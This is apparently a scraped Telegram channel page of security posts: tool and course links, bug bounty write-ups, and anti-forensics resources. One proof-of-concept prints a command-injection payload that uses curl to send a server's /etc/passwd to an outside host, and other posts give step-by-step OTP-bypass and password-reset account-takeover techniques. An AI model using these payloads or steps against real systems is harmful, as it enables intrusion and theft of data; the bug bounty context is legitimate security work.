UNDERCODE TESTING
312 subscribers
311 photos
24 videos
173 files
29.9K links
๐Ÿฆ‘ World first platform which Collect & Analyzes every New hacking method.

+ Free AI Practice.

(New Bug Bounty Methods, Tools Updates, AI & Courses).

โœจ Services: Undercode.help/services

โœจyoutube.com/undercode

@Undercode_Testing
Download Telegram
๐Ÿฆ‘ThievingFox - Remotely retrieving credentials from password managers and Windows utilities:

https://lnkd.in/dfXhpv_D
UNDERCODE TESTING
GIF
๐Ÿฆ‘One of the visualization tools that can help in detecting anomalies in large amounts of data that you may not know!

If you are in the cybersecurity field, you know the importance of analyzing large volumes of log data.. ๐Ÿ˜ฎโ€๐Ÿ’จ

This tool is an open-source visualization software designed to interactively explore and understand massive amounts of tabular data!

๐’๐ช๐ฎ๐ž๐ฒ

๐Ÿ”นIt gives users an detailed yet intuitive multi-view representation of column-oriented data and can ingest from:
- Structured text files (CSV, logs, ...)
- Apache Parquet files
- Pcap files
- SQL databases
- Elasticsearch databases

๐Ÿ”น It delivers value through its VISU approach:
- Visualize: Leverage various visual representations of raw data in combination with statistics.
- Investigate: Use filters to build an accurate understanding of millions of rows while switching instantly between capturing the big picture and focusing on the details.
- Spot the Unknown: As a structured understanding of the data emerges, identify unknowns and anomalies.

๐Ÿ”น It can be used for many different purposes, such as:
Cybersecurity (to detect attacks and data leaks), BI and Big Data, IT troubleshooting, and Machine Learning.

๐Ÿ”— To download: squey[.]org/download/
๐Ÿ”— Documentation: doc[.]squey[.]org

๐Ÿ”ด If you want my advice, I would recommend installing it and solve a network forensics (PCAP file) challenge, to have an idea about it first ๐Ÿ˜‰

๐Ÿ”ดNote: To install it on Windows, you need to have installed and enabled WSL2.

Ref: Shbib
@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘2025 FREE Certification Courses!

No Fee, No Subscription, No Registration Required, Just Start Learning.
These Courses Includes Video Lectures, Tutorial and Easy Notes.
All courses are from the Microsoft Learn platform.
Microsoft Learn
.

1-Microsoft Azure Administrator
- Course AZ-104T00
- Course Link: https://lnkd.in/dUEGRTgq

2-Configuring and Operating Microsoft Azure Virtual Desktop
- Course AZ-140
- Course Link: https://lnkd.in/dWCUPjTC

3-Designing Microsoft Azure Infrastructure Solutions
- Course AZ-305T00
- Course Link: https://lnkd.in/dmvHyJ_z

4-Developing Solutions for Microsoft Azure
- Course AZ-204T00
- Course Link:https://lnkd.in/dtfBZBN6

5-Designing and Implementing Microsoft DevOps solutions
- Course AZ-400T00
- Course Link:https://lnkd.in/drCiHKgM

6-Designing and Implementing a Microsoft Azure AI Solution
- Course AI-102T00
- Course Link: https://lnkd.in/ducvr87J

7-Develop Generative AI Solutions with Azure OpenAI Service
- Course AI-050T00
- Course Link: https://lnkd.in/dJFW_PgR

8- Microsoft Security, Compliance, and Identity Fundamentals
- Course SC-900T00
- Course Link: https://lnkd.in/dRgx4EKG

9- Data Engineering on Microsoft Azure
- Course DP-203T00
- Course Link: https://lnkd.in/dSU6QmgT

10-Microsoft Security Operations Analyst
- Course SC-200T00
- Course Link: https://lnkd.in/d2EYRJph

11- Designing and Implementing Microsoft Azure Networking Solutions
- Course AZ-700T00
- Course Link: https://lnkd.in/dhDBjPaK

12-Designing and implementing a data science solution on Azure
- Course DP-100T01
- Course Link: https://lnkd.in/dUsB4GS6

13-Administering Microsoft Azure SQL Solutions
- Course DP-300T00
- Course Link:https://lnkd.in/d-5CzTDz

14-Microsoft Cybersecurity Architect
- Course SC-100T00
- Course Link: https://lnkd.in/dRhNSNsQ

15-Microsoft Azure Security Technologies
- Course AZ-500T00
- Course Link:https://lnkd.in/dPARyEZB

16-Azure Support Engineer Troubleshooting Azure Connectivity
- Course AZ-720T00
- Course Link: https://lnkd.in/d87-6RmC

17-Administering Windows Server Hybrid Core Infrastructure
- Course AZ-800T00
- Course Link:https://lnkd.in/dimC-puE

18-Configuring Windows Server Hybrid Advanced Services
- Course AZ-801T00
-Course Link:https://lnkd.in/dmXNAtP5

Ref: Shahzad MS
@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Media is too big
VIEW IN TELEGRAM
๐Ÿฆ‘ Bypassing CrowdStrike EDR with Hookchain and Custom Shellcode ๐Ÿšจ

๐Ÿ” Key Points:
- Utilizing the Hookchain technique for evasion of detection.
- Designing custom shellcode for discreet execution.
- Illustrating the necessity for robust detection methods surpassing traditional EDR capabilities.

This experiment sheds light on critical vulnerabilities that sophisticated attackers could exploit, emphasizing the significance of embracing multi-layered security approaches.

๐Ÿ›ก๏ธ Disclaimer: This exploration serves solely for educational purposes, aiming to deepen comprehension of EDR bypass strategies for enhanced defense mechanisms. The primary objective? Strengthening cybersecurity infrastructures.

Ref: Ammar. A
@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘Broken Access Control: From Password Reset to Mass Account Takeover

A critical vulnerability in the password reset functionality of an API endpoint (/api/u/resetPwd). Hereโ€™s how it unfolded:

1๏ธโƒฃ The endpoint accepts a username parameter and sends a password reset link to the user's email.
2๏ธโƒฃ The use of "u" in the endpoint (u=user) hinted that other roles like admin (a=admin) or superuser (su) might exist.
3๏ธโƒฃ Attempts to reset admin passwords via /api/admin/resetPwd and /api/administrator/resetPwd failed.
4๏ธโƒฃ However, /api/su/resetPwd worked, allowing me to reset the superuser password!
5๏ธโƒฃ The reset mechanism generated predictable passwords like username + ab12*. For example, resetting for admin resulted in adminab12*.

๐ŸŽฏ Impact: This flaw allowed unauthorized access to critical accounts, leading to mass account takeover.

Ref: Amit Kumar
@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘Anti Forensic Techniques Repositories #1

Anti Forensic Techniques
https://lnkd.in/dWmF3ikg

Awesome Anti Forensic by Shadawck
https://lnkd.in/dm2MFpV6

Anti Forensic Techniques by Hacktricks
https://lnkd.in/dimT7PJb

Windows Anti Forensic Script by MikeHorn
https://lnkd.in/d2h39Kg2

Anti Forensic Detection Tool by kuritsutianu
https://lnkd.in/dq4-7T9m

Anti Forensics Tool For Red Teamers by PaulNorman01
https://lnkd.in/d9A7t_Tx

AntiForensic.NET :: Windows anti-forensics made easy by hsheric0210
https://lnkd.in/dMsRJRYR

Anti Forensic Study by CCDCOE
https://lnkd.in/djhFgdqz

Ref: Joas A Santos
@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘Awesome Security - A collection of awesome software, libraries, documents, books, and resources about security.

๐Ÿ”—https://lnkd.in/dGb2hzyY
Awesome Web Security - Web Security materials and resources for cutting-edge penetration techniques.

๐Ÿ”—https://lnkd.in/d3kxd9ik

โญ•๏ธAwesome Machine Learning for Cyber Security Tools and resources on machine learning for cybersecurity.

๐Ÿ”—https://lnkd.in/dZPtJmXV

โญ•๏ธawesome-web-hacking - Resources for learning about web application security.

๐Ÿ”—https://lnkd.in/dqmeXsgj

โญ•๏ธawesome-mobile-security - Maintained by @vaib25vicky with contributions from the security and developer communities.

๐Ÿ”—https://lnkd.in/dbbvfeYT

โญ•๏ธawesome-threat-intelligence - A curated list of awesome Threat Intelligence resources.

๐Ÿ”—https://lnkd.in/dSPyZAQn
awesome-security-hardening - Collection of security hardening guides, best practices, and tools.

๐Ÿ”—https://lnkd.in/de_PyRxH
security-hardening

โญ•๏ธAwesome Cyber Security - A collection of software, libraries, documents, and resources about security.

๐Ÿ”—https://lnkd.in/dXztUHKk

@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘OTP Bypass on Register account via Response manipulation:

1. First Method
1. Register account with mobile number and request for OTP.
2. Enter incorrect OTP and capture the request in Burpsuite.
3. Do intercept response to this request and forward the request.
4. response will be
{"verificationStatus": false, "mobile": 9072346577", "profileld": "84673832"}
5. Change this response to
{"verificationStatus": true, "mobile": 9072346577", "profileId": "84673832" }
6. And forward the response.
7. You will be logged in to the account.

Impact: Account Takeover

2. Second Method.
1. Go to login and wait for OTP pop up.
2. Enter incorrect OTP and capture the request in Burpsuite.
3. Do intercept response to this request and forward the request.
4. response will be <error>
5. Change this response to
success
6. And forward the response.

Ref: Het Vikam
@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘Bypass Login Prompts on Instagram & Pinterest! #OSINT

๐Ÿ” #OSINT Protip 9 by KartikHunt3r:
If you didnโ€™t know about this trick before, you should now! Thereโ€™s a simple way to bypass the login prompt when scrolling through an Instagram profile. This technique also works with Pinterest.

๐Ÿ“Œ Protip: By using this method, you can view profiles and posts without needing to log in, saving time and keeping your research anonymous.

๐Ÿ’ก This can be incredibly useful for OSINT investigations when you want to gather public data without the need for creating accounts or logging in.
Stay tuned for more helpful tips in my #OSINT Seriesโ€”enhancing your digital investigation skills! ๐Ÿš€

๐Ÿ’ฌ Found this tip helpful? Like, share, and follow for more OSINT hacks!

@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
This media is not supported in your browser
VIEW IN TELEGRAM
๐Ÿฆ‘Live Bug Bounty :

Welcome to HackWithRohit, your go-to channel for bug bounty and cybersecurity insights! ๐ŸŒŸ In todayโ€™s video, weโ€™re diving deep into an advanced vulnerability chain: Reverse Tabnabbing leading to Cross-Site Scripting (XSS).

๐ŸŒŸ What Youโ€™ll Learn in This Video
1๏ธโƒฃ What is Reverse Tabnabbing?
Explore how attackers manipulate the target="_blank" attribute to take control of a user's previously trusted page.
Understand how this technique works and its implications.
2๏ธโƒฃ How Does It Lead to XSS?
Step-by-step walkthrough of leveraging Reverse Tabnabbing to inject malicious scripts.
Real-world example: Injecting an XSS payload through hijacked pages.

Ref: Rohith S.
@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘POC steps:
01: I visit my target, I see my target, and I send a POST request to /v1/api HTTP/1.

02: I add this for getting the server location and other information. I replace with my Burp collaborator:

action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1&region=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+https://lnkd.in/dyhGdqi2)

04: After sending the request, I see the response: "return":false,"reason":"Syntax error!"

05: In Burp collaborator, I can see the server's /etc/passwd file.

@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘๐…๐‘๐„๐„ ๐‘๐„๐’๐Ž๐”๐‘๐‚๐„๐’ - ๐๐‹๐€๐‚๐Š ๐‡๐ˆ๐‹๐‹๐’ ๐ˆ๐๐…๐Ž๐‘๐Œ๐€๐“๐ˆ๐Ž๐ ๐’๐„๐‚๐”๐‘๐ˆ๐“๐˜

Check out Black Hills Information Security for top-notch cybersecurity content created by experts in the field. Their informative and engaging videos cover a range of topics, from the latest threats and vulnerabilities to strategies for protecting your systems and data.

๐Ÿ‘‰ ๐—•๐—จ๐—œ๐—Ÿ๐—— ๐—ฌ๐—ข๐—จ๐—ฅ ๐—›๐—ข๐— ๐—˜ ๐—Ÿ๐—”๐—•
๐ŸŒŸ How to Build a Home Lab for Infosec - Ralph May
http://ow.ly/ynS650NKLlS

๐Ÿ‘‰ ๐—ก๐—˜๐—ง๐—ช๐—ข๐—ฅ๐—ž ๐—ฆ๐—˜๐—–๐—จ๐—ฅ๐—œ๐—ง๐—ฌ
๐ŸŒŸ Networking for Pentesters: Beginner - Serena D.
http://ow.ly/CpgS50NKLlZ

๐Ÿ‘‰ ๐—ฃ๐—˜๐—ก๐—ง๐—˜๐—ฆ๐—ง๐—œ๐—ก๐—š
๐ŸŒŸ Introduction to Pentesting - Mike Felch
http://ow.ly/RVWX50NKLm0

๐ŸŒŸ Pentester Tactics, Techniques, and Procedures TTPs - Chris Traynor
http://ow.ly/BnMK50NKLlK

๐Ÿ‘‰ ๐—ช๐—˜๐—• ๐—”๐—ฃ๐—ฃ๐—Ÿ๐—œ๐—–๐—”๐—ง๐—œ๐—ข๐—ก ๐—”๐—ก๐—— ๐—•๐—จ๐—ฅ๐—ฃ ๐—ฆ๐—จ๐—œ๐—ง๐—˜
๐ŸŒŸ Getting Started with Burp Suite & Webapp Pentesting - BB King
http://ow.ly/7yv750NKLlP

๐ŸŒŸ Modern Webapp Pentesting: How to Attack a JWT - BB King
http://ow.ly/F37650NKLlQ

๐ŸŒŸ Basics of Burp(ing) for Testing Web App Security - Chris Traynor
http://ow.ly/nvMO50NKLlW

๐Ÿ‘‰ ๐—œ๐— ๐—ฃ๐—ฅ๐—ข๐—ฉ๐—˜ ๐—ฌ๐—ข๐—จ๐—ฅ ๐—ฃ๐—˜๐—ก๐—ง๐—˜๐—ฆ๐—ง ๐—ฅ๐—˜๐—ฃ๐—ข๐—ฅ๐—ง๐—ฆ
๐ŸŒŸ Things NOT to Do in Pentest Reports - Bronwen Aker
http://ow.ly/g3KP50NKLlV

๐Ÿ‘‰ ๐—ฅ๐—˜๐—— ๐—ง๐—˜๐—”๐— ๐—œ๐—ก๐—š
๐ŸŒŸ Atomic Red Team Hands on Getting Started Guide - Carrie & Darin Roberts
http://ow.ly/mzfG50NKLm2

๐ŸŒŸ OPSEC Fundamentals for Remote Red Teams - Michael Allen
http://ow.ly/sni250NKLlN

๐Ÿ‘‰ ๐—–๐—Ÿ๐—ข๐—จ๐—— ๐—ฃ๐—˜๐—ก๐—ง๐—˜๐—ฆ๐—ง
๐ŸŒŸ Get your head in the Clouds - Sean Verity
http://ow.ly/m4aM50NKLlI

๐ŸŒŸ Azure Console Pivoting 101 - Stephen Borosh
http://ow.ly/foGR50NKLlJ

๐ŸŒŸ Securing AWS Discover Cloud Vulnerabilities - Beau Bullock
http://ow.ly/pUyH50NKLlY

๐Ÿ‘‰ ๐—ช๐—˜๐—•๐Ÿฏ
๐ŸŒŸ Getting Started in Blockchain Security and Smart Contract Auditing - Beau Bullock
http://ow.ly/YSLC50NKLlO

๐ŸŒŸ Demystifying Web3 Attack Vectors - Beau Bullock & Steve Borosh
http://ow.ly/sWrv50NKLlT

๐Ÿ‘‰ ๐—๐—ข๐—• ๐—›๐—จ๐—ก๐—ง๐—œ๐—ก๐—š
๐ŸŒŸ How to Hunt for Jobs like a Hacker - Jason Blanchard
http://ow.ly/pzik50NKLlX

๐ŸŒŸ Infosec Job Hunting (Part 1)
http://ow.ly/4THW50NKLm1

๐Ÿ‘‰ ๐—•๐—ข๐—ก๐—จ๐—ฆ
๐ŸŒŸ Have fun with the PROMPT# Zines
http://ow.ly/BYt450NKLlU

Post Credit : Gabrielle
@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘The Ultimate IDOR Testing Checklist!

Are you testing for Insecure Direct Object References (IDOR) vulnerabilities? Here's a detailed checklist to ensure nothing slips through the cracks.

This comprehensive list covers everything from:
โœ… Testing parameter pollution
โœ… Exploring API versions and extensions
โœ… Swapping GUIDs with numeric IDs
โœ… Bypassing 403/401 responses
โœ… Blind IDORs and chaining with XSS for account takeovers

Whether you're a bug bounty hunter, pentester, or security enthusiast, this checklist will help you uncover those hidden vulnerabilities and secure applications effectively.

Ref: Amit Kumar
@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
SIMULATION FOR
CYBERSECURITY
ANALYST POSITION.pdf
238 KB
๐Ÿฆ‘"Interview Simulation For Cybersecurity Analyst Position (L1, L2, L3) From Various Background Complete With ATS Resume Examples". In this document, I have prepared six different career backgrounds for individuals seeking a cybersecurity analyst role, whether they are transitioning from another field or moving from L1 to L2 or L3 positions. Additionally, I have provided interview simulations for each job application, along with tailored ATS-optimised resumes.